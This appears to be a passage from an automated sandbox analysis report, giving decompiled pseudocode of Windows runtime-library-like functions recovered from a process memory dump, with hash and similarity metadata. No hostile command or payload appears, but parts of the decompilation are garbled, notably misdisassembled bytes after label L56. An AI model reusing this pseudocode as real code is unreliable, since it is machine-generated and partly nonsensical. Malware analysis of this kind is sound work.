                        				_push(0x90);
                        				_push(0x2c6f7a8);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                        				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                        				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                        				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                        				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                        				if(__edx == 0xffffffff) {
                        					L6:
                        					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                        					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                        					__eflags = _t65 & 0x00000002;
                        					if((_t65 & 0x00000002) != 0) {
                        						L3:
                        						L4:
                        						return E02BED130(_t95, _t108, _t109);
                        					}
                        					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                        					_t108 = 0;
                        					_t109 = 0;
                        					_t95 = 0;
                        					__eflags = 0;
                        					while(1) {
                        						__eflags = _t95 - 0x200;
                        						if(_t95 >= 0x200) {
                        							break;
                        						}
                        						E02BDD000(0x80);
                        						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                        						_t108 = _t115;
                        						_t95 = _t95 - 0xffffff80;
                        						_t17 = _t114 - 4;
                        						 *_t17 =  *(_t114 - 4) & 0x00000000;
                        						__eflags =  *_t17;
                        						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t102 = _t110 + 1;
                        						do {
                        							_t85 =  *_t110;
                        							_t110 = _t110 + 1;
                        							__eflags = _t85;
                        						} while (_t85 != 0);
                        						_t111 = _t110 - _t102;
                        						_t21 = _t95 - 1; // -129
                        						_t86 = _t21;
                        						__eflags = _t111 - _t86;
                        						if(_t111 > _t86) {
                        							_t111 = _t86;
                        						}
                        						E02BDF3E0(_t108, _t106, _t111);
                        						_t115 = _t115 + 0xc;
                        						_t103 = _t111 + _t108;
                        						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                        						_t89 = _t95 - _t111;
                        						__eflags = _t89;
                        						_push(0);
                        						if(_t89 == 0) {
                        							L15:
                        							_t109 = 0xc000000d;
                        							goto L16;
                        						} else {
                        							__eflags = _t89 - 0x7fffffff;
                        							if(_t89 <= 0x7fffffff) {
                        								L16:
                        								 *(_t114 - 0x94) = _t109;
                        								__eflags = _t109;
                        								if(_t109 < 0) {
                        									__eflags = _t89;
                        									if(_t89 != 0) {
                        										 *_t103 = 0;
                        									}
                        									L26:
                        									 *(_t114 - 0xa0) = _t109;
                        									 *(_t114 - 4) = 0xfffffffe;
                        									__eflags = _t109;
                        									if(_t109 >= 0) {
                        										L31:
                        										_t98 = _t108;
                        										_t39 = _t98 + 1; // 0x1
                        										_t106 = _t39;
                        										do {
                        											_t69 =  *_t98;
                        											_t98 = _t98 + 1;
                        											__eflags = _t69;
                        										} while (_t69 != 0);
                        										_t99 = _t98 - _t106;
                        										__eflags = _t99;
                        										L34:
                        										_t70 =  *[fs:0x30];
                        										__eflags =  *((char*)(_t70 + 2));
                        										if( *((char*)(_t70 + 2)) != 0) {
                        											L40:
                        											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                        											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                        											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                        											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                        											 *(_t114 - 4) = 1;
                        											_push(_t114 - 0x74);
                        											L02BEDEF0(_t99, _t106);
                        											 *(_t114 - 4) = 0xfffffffe;
                        											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        											goto L3;
                        										}
                        										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                        										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                        											goto L40;
                        										}
                        										_push( *((intOrPtr*)(_t114 + 8)));
                        										_push( *((intOrPtr*)(_t114 - 0x9c)));
                        										_push(_t99 & 0x0000ffff);
                        										_push(_t108);
                        										_push(1);
                        										_t101 = E02BDB280();
                        										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                        										if( *((char*)(_t114 + 0x14)) == 1) {
                        											__eflags = _t101 - 0x80000003;
                        											if(_t101 == 0x80000003) {
                        												E02BDB7E0(1);
                        												_t101 = 0;
                        												__eflags = 0;
                        											}
                        										}
                        										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        										goto L4;
                        									}
                        									__eflags = _t109 - 0x80000005;
                        									if(_t109 == 0x80000005) {
                        										continue;
                        									}
                        									break;
                        								}
                        								 *(_t114 - 0x90) = 0;
                        								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                        								_t91 = E02BDE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                        								_t115 = _t115 + 0x10;
                        								_t104 = _t91;
                        								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                        								__eflags = _t104;
                        								if(_t104 < 0) {
                        									L21:
                        									_t109 = 0x80000005;
                        									 *(_t114 - 0x90) = 0x80000005;
                        									L22:
                        									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                        									L23:
                        									 *(_t114 - 0x94) = _t109;
                        									goto L26;
                        								}
                        								__eflags = _t104 - _t92;
                        								if(__eflags > 0) {
                        									goto L21;
                        								}
                        								if(__eflags == 0) {
                        									goto L22;
                        								}
                        								goto L23;
                        							}
                        							goto L15;
                        						}
                        					}
                        					__eflags = _t109;
                        					if(_t109 >= 0) {
                        						goto L31;
                        					}
                        					__eflags = _t109 - 0x80000005;
                        					if(_t109 != 0x80000005) {
                        						goto L31;
                        					}
                        					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                        					_t38 = _t95 - 1; // -129
                        					_t99 = _t38;
                        					goto L34;
                        				}
                        				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                        					__eflags = __edx - 0x65;
                        					if(__edx != 0x65) {
                        						goto L2;
                        					}
                        					goto L6;
                        				}
                        				L2:
                        				_push( *((intOrPtr*)(_t114 + 8)));
                        				_push(_t106);
                        				if(E02BDA890() != 0) {
                        					goto L6;
                        				}
                        				goto L3;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: _vswprintf_s
                        • String ID:
                        • API String ID: 677850445-0
                        • Opcode ID: ff67d81cda76860a2c6aad26f041d9d09f4d9bca00b7ba9033e14a85d69a1093
                        • Instruction ID: 1d8478ff464035d6f68d15248ded68f8ad447ba9195b85e2f771befcb6090704
                        • Opcode Fuzzy Hash: ff67d81cda76860a2c6aad26f041d9d09f4d9bca00b7ba9033e14a85d69a1093
                        • Instruction Fuzzy Hash: 3351CC71E002A98FDF61CF688844BAEBBB1FF00714F1081EDDB59AB281D77059898F90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02BBB944(signed int* __ecx, char __edx) {
                        				signed int _v8;
                        				signed int _v16;
                        				signed int _v20;
                        				char _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				signed int* _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				intOrPtr _v76;
                        				char _v77;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t65;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				char* _t73;
                        				intOrPtr _t77;
                        				intOrPtr _t78;
                        				signed int _t82;
                        				intOrPtr _t83;
                        				void* _t87;
                        				char _t88;
                        				intOrPtr* _t89;
                        				intOrPtr _t91;
                        				void* _t97;
                        				intOrPtr _t100;
                        				void* _t102;
                        				void* _t107;
                        				signed int _t108;
                        				intOrPtr* _t112;
                        				void* _t113;
                        				intOrPtr* _t114;
                        				intOrPtr _t115;
                        				intOrPtr _t116;
                        				intOrPtr _t117;
                        				signed int _t118;
                        				void* _t130;
                        
                        				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                        				_v8 =  *0x2c8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                        				_t112 = __ecx;
                        				_v77 = __edx;
                        				_v48 = __ecx;
                        				_v28 = 0;
                        				_t5 = _t112 + 0xc; // 0x575651ff
                        				_t105 =  *_t5;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(_t105 == 0) {
                        					_t50 = _t112 + 4; // 0x5de58b5b
                        					_t60 =  *__ecx |  *_t50;
                        					if(( *__ecx |  *_t50) != 0) {
                        						 *__ecx = 0;
                        						__ecx[1] = 0;
                        						if(E02BB7D50() != 0) {
                        							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t65 = 0x7ffe0386;
                        						}
                        						if( *_t65 != 0) {
                        							E02C68CD6(_t112);
                        						}
                        						_push(0);
                        						_t52 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t52);
                        						_t60 = E02BD9E20();
                        					}
                        					L20:
                        					_pop(_t107);
                        					_pop(_t113);
                        					_pop(_t87);
                        					return E02BDB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                        				}
                        				_t8 = _t112 + 8; // 0x8b000cc2
                        				_t67 =  *_t8;
                        				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                        				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                        				_t108 =  *(_t67 + 0x14);
                        				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                        				_t105 = 0x2710;
                        				asm("sbb eax, edi");
                        				_v44 = _t88;
                        				_v52 = _t108;
                        				_t60 = E02BDCE00(_t97, _t68, 0x2710, 0);
                        				_v56 = _t60;
                        				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                        					L3:
                        					 *(_t112 + 0x44) = _t60;
                        					_t105 = _t60 * 0x2710 >> 0x20;
                        					 *_t112 = _t88;
                        					 *(_t112 + 4) = _t108;
                        					_v20 = _t60 * 0x2710;
                        					_v16 = _t60 * 0x2710 >> 0x20;
                        					if(_v77 != 0) {
                        						L16:
                        						_v36 = _t88;
                        						_v32 = _t108;
                        						if(E02BB7D50() != 0) {
                        							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t73 = 0x7ffe0386;
                        						}
                        						if( *_t73 != 0) {
                        							_t105 = _v40;
                        							E02C68F6A(_t112, _v40, _t88, _t108);
                        						}
                        						_push( &_v28);
                        						_push(0);
                        						_push( &_v36);
                        						_t48 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t48);
                        						_t60 = E02BDAF60();
                        						goto L20;
                        					} else {
                        						_t89 = 0x7ffe03b0;
                        						do {
                        							_t114 = 0x7ffe0010;
                        							do {
                        								_t77 =  *0x2c88628; // 0x0
                        								_v68 = _t77;
                        								_t78 =  *0x2c8862c; // 0x0
                        								_v64 = _t78;
                        								_v72 =  *_t89;
                        								_v76 =  *((intOrPtr*)(_t89 + 4));
                        								while(1) {
                        									_t105 =  *0x7ffe000c;
                        									_t100 =  *0x7ffe0008;
                        									if(_t105 ==  *_t114) {
                        										goto L8;
                        									}
                        									asm("pause");
                        								}
                        								L8:
                        								_t89 = 0x7ffe03b0;
                        								_t115 =  *0x7ffe03b0;
                        								_t82 =  *0x7FFE03B4;
                        								_v60 = _t115;
                        								_t114 = 0x7ffe0010;
                        								_v56 = _t82;
                        							} while (_v72 != _t115 || _v76 != _t82);
                        							_t83 =  *0x2c88628; // 0x0
                        							_t116 =  *0x2c8862c; // 0x0
                        							_v76 = _t116;
                        							_t117 = _v68;
                        						} while (_t117 != _t83 || _v64 != _v76);
                        						asm("sbb edx, [esp+0x24]");
                        						_t102 = _t100 - _v60 - _t117;
                        						_t112 = _v48;
                        						_t91 = _v44;
                        						asm("sbb edx, eax");
                        						_t130 = _t105 - _v52;
                        						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                        							_t88 = _t102 - _t91;
                        							asm("sbb edx, edi");
                        							_t108 = _t105;
                        						} else {
                        							_t88 = 0;
                        							_t108 = 0;
                        						}
                        						goto L16;
                        					}
                        				} else {
                        					if( *(_t112 + 0x44) == _t60) {
                        						goto L20;
                        					}
                        					goto L3;
                        				}
                        			}

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02BBB9A5
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 885266447-0
                        • Opcode ID: 81a5f0326a5962bd9355a6d9bb0dfe40d50c651fd2a627f158da411ffa043ec4
                        • Instruction ID: 8ea6f94e3b31087a3da629f0bc5009219acab75288a239dbd721e55d266b7a86
                        • Opcode Fuzzy Hash: 81a5f0326a5962bd9355a6d9bb0dfe40d50c651fd2a627f158da411ffa043ec4
                        • Instruction Fuzzy Hash: 57515E71A04700CFC721CF29C4C0A6ABBE5FF89718F5449AEE99597354DBB0E844CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E02BC2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                        				signed int _v8;
                        				signed int _v16;
                        				unsigned int _v24;
                        				void* _v28;
                        				signed int _v32;
                        				unsigned int _v36;
                        				signed int _v37;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _t235;
                        				signed int _t239;
                        				void* _t241;
                        				signed int _t244;
                        				signed int _t246;
                        				intOrPtr _t248;
                        				signed int _t251;
                        				signed int _t258;
                        				signed int _t261;
                        				signed int _t269;
                        				signed int _t275;
                        				signed int _t277;
                        				void* _t280;
                        				void* _t282;
                        				signed int _t283;
                        				unsigned int _t286;
                        				signed int _t290;
                        				signed int _t294;
                        				signed int _t298;
                        				intOrPtr _t311;
                        				signed int _t320;
                        				signed int _t322;
                        				signed int _t323;
                        				signed int _t327;
                        				signed int _t328;
                        				signed int _t330;
                        				signed int _t332;
                        				signed int _t334;
                        				void* _t335;
                        				void* _t342;
                        
                        				_t332 = _t334;
                        				_t335 = _t334 - 0x4c;
                        				_v8 =  *0x2c8d360 ^ _t332;
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t327 = 0x2c8b2e8;
                        				_v56 = _a4;
                        				_v48 = __edx;
                        				_v60 = __ecx;
                        				_t286 = 0;
                        				_v80 = 0;
                        				asm("movsd");
                        				_v64 = 0;
                        				_v76 = 0;
                        				_v72 = 0;
                        				asm("movsd");
                        				_v44 = 0;
                        				_v52 = 0;
                        				_v68 = 0;
                        				asm("movsd");
                        				_v32 = 0;
                        				_v36 = 0;
                        				asm("movsd");
                        				_v16 = 0;
                        				_t275 = 0x48;
                        				_t308 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                        				_t320 = 0;
                        				_v37 = _t308;
                        				if(_v48 <= 0) {
                        					L16:
                        					_t45 = _t275 - 0x48; // 0x0
                        					__eflags = _t45 - 0xfffe;
                        					if(_t45 > 0xfffe) {
                        						_t328 = 0xc0000106;
                        						goto L32;
                        					} else {
                        						_t327 = L02BB4620(_t286,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                        						_v52 = _t327;
                        						__eflags = _t327;
                        						if(_t327 == 0) {
                        							_t328 = 0xc0000017;
                        							goto L32;
                        						} else {
                        							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
                        							_t50 = _t327 + 0x48; // 0x48
                        							_t322 = _t50;
                        							_t308 = _v32;
                        							 *(_t327 + 0x3c) = _t275;
                        							_t277 = 0;
                        							 *((short*)(_t327 + 0x30)) = _v48;
                        							__eflags = _t308;
                        							if(_t308 != 0) {
                        								 *(_t327 + 0x18) = _t322;
                        								__eflags = _t308 - 0x2c88478;
                        								 *_t327 = ((0 | _t308 == 0x02c88478) - 0x00000001 & 0xfffffffb) + 7;
                        								E02BDF3E0(_t322,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
                        								_t308 = _v32;
                        								_t335 = _t335 + 0xc;
                        								_t277 = 1;
                        								__eflags = _a8;
                        								_t322 = _t322 + (( *_t308 & 0x0000ffff) >> 1) * 2;
                        								if(_a8 != 0) {
                        									_t269 = E02C239F2(_t322);
                        									_t308 = _v32;
                        									_t322 = _t269;
                        								}
                        							}
                        							_t290 = 0;
                        							_v16 = 0;
                        							__eflags = _v48;
                        							if(_v48 <= 0) {
                        								L31:
                        								_t328 = _v68;
                        								__eflags = 0;
                        								 *((short*)(_t322 - 2)) = 0;
                        								goto L32;
                        							} else {
                        								_t275 = _t327 + _t277 * 4;
                        								_v56 = _t275;
                        								do {
                        									__eflags = _t308;
                        									if(_t308 != 0) {
                        										_t235 =  *(_v60 + _t290 * 4);
                        										__eflags = _t235;
                        										if(_t235 == 0) {
                        											goto L30;
                        										} else {
                        											__eflags = _t235 == 5;
                        											if(_t235 == 5) {
                        												goto L30;
                        											} else {
                        												goto L22;
                        											}
                        										}
                        									} else {
                        										L22:
                        										 *_t275 =  *(_v60 + _t290 * 4);
                        										 *(_t275 + 0x18) = _t322;
                        										_t239 =  *(_v60 + _t290 * 4);
                        										__eflags = _t239 - 8;
                        										if(_t239 > 8) {
                        											goto L56;
                        										} else {
                        											switch( *((intOrPtr*)(_t239 * 4 +  &M02BC2959))) {
                        												case 0:
                        													__ax =  *0x2c88488;
                        													__eflags = __ax;
                        													if(__ax == 0) {
                        														goto L29;
                        													} else {
                        														__ax & 0x0000ffff = E02BDF3E0(__edi,  *0x2c8848c, __ax & 0x0000ffff);
                        														__eax =  *0x2c88488 & 0x0000ffff;
                        														goto L26;
                        													}
                        													goto L108;
                        												case 1:
                        													L45:
                        													E02BDF3E0(_t322, _v80, _v64);
                        													_t264 = _v64;
                        													goto L26;
                        												case 2:
                        													 *0x2c88480 & 0x0000ffff = E02BDF3E0(__edi,  *0x2c88484,  *0x2c88480 & 0x0000ffff);
                        													__eax =  *0x2c88480 & 0x0000ffff;
                        													__eax = ( *0x2c88480 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													goto L28;
                        												case 3:
                        													__eax = _v44;
                        													__eflags = __eax;
                        													if(__eax == 0) {
                        														goto L29;
                        													} else {
                        														__esi = __eax + __eax;
                        														__eax = E02BDF3E0(__edi, _v72, __esi);
                        														__edi = __edi + __esi;
                        														__esi = _v52;
                        														goto L27;
                        													}
                        													goto L108;
                        												case 4:
                        													_push(0x2e);
                        													_pop(__eax);
                        													 *(__esi + 0x44) = __edi;
                        													 *__edi = __ax;
                        													__edi = __edi + 4;
                        													_push(0x3b);
                        													_pop(__eax);
                        													 *(__edi - 2) = __ax;
                        													goto L29;
                        												case 5:
                        													__eflags = _v36;
                        													if(_v36 == 0) {
                        														goto L45;
                        													} else {
                        														E02BDF3E0(_t322, _v76, _v36);
                        														_t264 = _v36;
                        													}
                        													L26:
                        													_t335 = _t335 + 0xc;
                        													_t322 = _t322 + (_t264 >> 1) * 2 + 2;
                        													__eflags = _t322;
                        													L27:
                        													_push(0x3b);
                        													_pop(_t266);
                        													 *((short*)(_t322 - 2)) = _t266;
                        													goto L28;
                        												case 6:
                        													__ebx =  *0x2c8575c;
                        													__eflags = __ebx - 0x2c8575c;
                        													if(__ebx != 0x2c8575c) {
                        														_push(0x3b);
                        														_pop(__esi);
                        														do {
                        															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                        															E02BDF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                        															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                        															__edi = __edi + __eax * 2;
                        															__edi = __edi + 2;
                        															 *(__edi - 2) = __si;
                        															__ebx =  *__ebx;
                        															__eflags = __ebx - 0x2c8575c;
                        														} while (__ebx != 0x2c8575c);
                        														__esi = _v52;
                        														__ecx = _v16;
                        														__edx = _v32;
                        													}
                        													__ebx = _v56;
                        													goto L29;
                        												case 7:
                        													 *0x2c88478 & 0x0000ffff = E02BDF3E0(__edi,  *0x2c8847c,  *0x2c88478 & 0x0000ffff);
                        													__eax =  *0x2c88478 & 0x0000ffff;
                        													__eax = ( *0x2c88478 & 0x0000ffff) >> 1;
                        													__eflags = _a8;
                        													__edi = __edi + __eax * 2;
                        													if(_a8 != 0) {
                        														__ecx = __edi;
                        														__eax = E02C239F2(__ecx);
                        														__edi = __eax;
                        													}
                        													goto L28;
                        												case 8:
                        													__eax = 0;
                        													 *(__edi - 2) = __ax;
                        													 *0x2c86e58 & 0x0000ffff = E02BDF3E0(__edi,  *0x2c86e5c,  *0x2c86e58 & 0x0000ffff);
                        													 *(__esi + 0x38) = __edi;
                        													__eax =  *0x2c86e58 & 0x0000ffff;
                        													__eax = ( *0x2c86e58 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													__edi = __edi + 2;
                        													L28:
                        													_t290 = _v16;
                        													_t308 = _v32;
                        													L29:
                        													_t275 = _t275 + 4;
                        													__eflags = _t275;
                        													_v56 = _t275;
                        													goto L30;
                        											}
                        										}
                        									}
                        									goto L108;
                        									L30:
                        									_t290 = _t290 + 1;
                        									_v16 = _t290;
                        									__eflags = _t290 - _v48;
                        								} while (_t290 < _v48);
                        								goto L31;
                        							}
                        						}
                        					}
                        				} else {
                        					while(1) {
                        						L1:
                        						_t239 =  *(_v60 + _t320 * 4);
                        						if(_t239 > 8) {
                        							break;
                        						}
                        						switch( *((intOrPtr*)(_t239 * 4 +  &M02BC2935))) {
                        							case 0:
                        								__ax =  *0x2c88488;
                        								__eflags = __ax;
                        								if(__ax != 0) {
                        									__eax = __ax & 0x0000ffff;
                        									__ebx = __ebx + 2;
                        									__eflags = __ebx;
                        									goto L53;
                        								}
                        								goto L14;
                        							case 1:
                        								L44:
                        								_t308 =  &_v64;
                        								_v80 = E02BC2E3E(0,  &_v64);
                        								_t275 = _t275 + _v64 + 2;
                        								goto L13;
                        							case 2:
                        								__eax =  *0x2c88480 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x2c88480;
                        									goto L80;
                        								}
                        								goto L14;
                        							case 3:
                        								__eax = E02BAEEF0(0x2c879a0);
                        								__eax =  &_v44;
                        								_push(__eax);
                        								_push(0);
                        								_push(0);
                        								_push(4);
                        								_push(L"PATH");
                        								_push(0);
                        								L57();
                        								__esi = __eax;
                        								_v68 = __esi;
                        								__eflags = __esi - 0xc0000023;
                        								if(__esi != 0xc0000023) {
                        									L10:
                        									__eax = E02BAEB70(__ecx, 0x2c879a0);
                        									__eflags = __esi - 0xc0000100;
                        									if(__esi == 0xc0000100) {
                        										_v44 = _v44 & 0x00000000;
                        										__eax = 0;
                        										_v68 = 0;
                        										goto L13;
                        									} else {
                        										__eflags = __esi;
                        										if(__esi < 0) {
                        											L32:
                        											_t213 = _v72;
                        											__eflags = _t213;
                        											if(_t213 != 0) {
                        												L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
                        											}
                        											_t214 = _v52;
                        											__eflags = _t214;
                        											if(_t214 != 0) {
                        												__eflags = _t328;
                        												if(_t328 < 0) {
                        													L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
                        													_t214 = 0;
                        												}
                        											}
                        											goto L36;
                        										} else {
                        											__eax = _v44;
                        											__ebx = __ebx + __eax * 2;
                        											__ebx = __ebx + 2;
                        											__eflags = __ebx;
                        											L13:
                        											_t286 = _v36;
                        											goto L14;
                        										}
                        									}
                        								} else {
                        									__eax = _v44;
                        									__ecx =  *0x2c87b9c; // 0x0
                        									_v44 + _v44 =  *[fs:0x30];
                        									__ecx = __ecx + 0x180000;
                        									__eax = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                        									_v72 = __eax;
                        									__eflags = __eax;
                        									if(__eax == 0) {
                        										__eax = E02BAEB70(__ecx, 0x2c879a0);
                        										__eax = _v52;
                        										L36:
                        										_pop(_t321);
                        										_pop(_t329);
                        										__eflags = _v8 ^ _t332;
                        										_pop(_t276);
                        										return E02BDB640(_t214, _t276, _v8 ^ _t332, _t308, _t321, _t329);
                        									} else {
                        										__ecx =  &_v44;
                        										_push(__ecx);
                        										_push(_v44);
                        										_push(__eax);
                        										_push(4);
                        										_push(L"PATH");
                        										_push(0);
                        										L57();
                        										__esi = __eax;
                        										_v68 = __eax;
                        										goto L10;
                        									}
                        								}
                        								goto L108;
                        							case 4:
                        								__ebx = __ebx + 4;
                        								goto L14;
                        							case 5:
                        								_t271 = _v56;
                        								if(_v56 != 0) {
                        									_t308 =  &_v36;
                        									_t273 = E02BC2E3E(_t271,  &_v36);
                        									_t286 = _v36;
                        									_v76 = _t273;
                        								}
                        								if(_t286 == 0) {
                        									goto L44;
                        								} else {
                        									_t275 = _t275 + 2 + _t286;
                        								}
                        								goto L14;
                        							case 6:
                        								__eax =  *0x2c85764 & 0x0000ffff;
                        								goto L53;
                        							case 7:
                        								__eax =  *0x2c88478 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = _a8;
                        								if(_a8 != 0) {
                        									__ebx = __ebx + 0x16;
                        									__ebx = __ebx + __eax;
                        								}
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x2c88478;
                        									L80:
                        									_v32 = __eax;
                        								}
                        								goto L14;
                        							case 8:
                        								__eax =  *0x2c86e58 & 0x0000ffff;
                        								__eax = ( *0x2c86e58 & 0x0000ffff) + 2;
                        								L53:
                        								__ebx = __ebx + __eax;
                        								L14:
                        								_t320 = _t320 + 1;
                        								if(_t320 >= _v48) {
                        									goto L16;
                        								} else {
                        									_t308 = _v37;
                        									goto L1;
                        								}
                        								goto L108;
                        						}
                        					}
                        					L56:
                        					asm("int 0x29");
                        					asm("out 0x28, al");
                        					asm("daa");
                        					_t241 = _t239 + _t239 +  *((intOrPtr*)(_t327 + 0x28));
                        					_t280 = 0x25;
                        					asm("rol byte [edx], 0x94");
                        					 *((intOrPtr*)(_t308 + _t241 + 0x2c05b35)) =  *((intOrPtr*)(_t308 + _t241 + 0x2c05b35)) - _t280;
                        					asm("daa");
                        					_t342 = 0xbc275d02;
                        					_pop(_t282);
                        					asm("rol byte [edx], 0xb4");
                        					 *((intOrPtr*)(_t308 + _t308 + _t241 + 0x2c05c34)) =  *((intOrPtr*)(_t308 + _t308 + _t241 + 0x2c05c34)) - _t282;
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(0x20);
                        					_push(0x2c6ff00);
                        					E02BED08C(_t282, _t322, _t327);
                        					_v44 =  *[fs:0x18];
                        					_t323 = 0;
                        					 *_a24 = 0;
                        					_t283 = _a12;
                        					__eflags = _t283;
                        					if(_t283 == 0) {
                        						_t244 = 0xc0000100;
                        					} else {
                        						_v8 = 0;
                        						_t330 = 0xc0000100;
                        						_v52 = 0xc0000100;
                        						_t246 = 4;
                        						while(1) {
                        							_v40 = _t246;
                        							__eflags = _t246;
                        							if(_t246 == 0) {
                        								break;
                        							}
                        							_t298 = _t246 * 0xc;
                        							_v48 = _t298;
                        							__eflags = _t283 -  *((intOrPtr*)(_t298 + 0x2b71664));
                        							if(__eflags <= 0) {
                        								if(__eflags == 0) {
                        									_t261 = E02BDE5C0(_a8,  *((intOrPtr*)(_t298 + 0x2b71668)), _t283);
                        									_t342 = _t342 + 0xc;
                        									__eflags = _t261;
                        									if(__eflags == 0) {
                        										_t330 = E02C151BE(_t283,  *((intOrPtr*)(_v48 + 0x2b7166c)), _a16, _t323, _t330, __eflags, _a20, _a24);
                        										_v52 = _t330;
                        										break;
                        									} else {
                        										_t246 = _v40;
                        										goto L62;
                        									}
                        									goto L70;
                        								} else {
                        									L62:
                        									_t246 = _t246 - 1;
                        									continue;
                        								}
                        							}
                        							break;
                        						}
                        						_v32 = _t330;
                        						__eflags = _t330;
                        						if(_t330 < 0) {
                        							__eflags = _t330 - 0xc0000100;
                        							if(_t330 == 0xc0000100) {
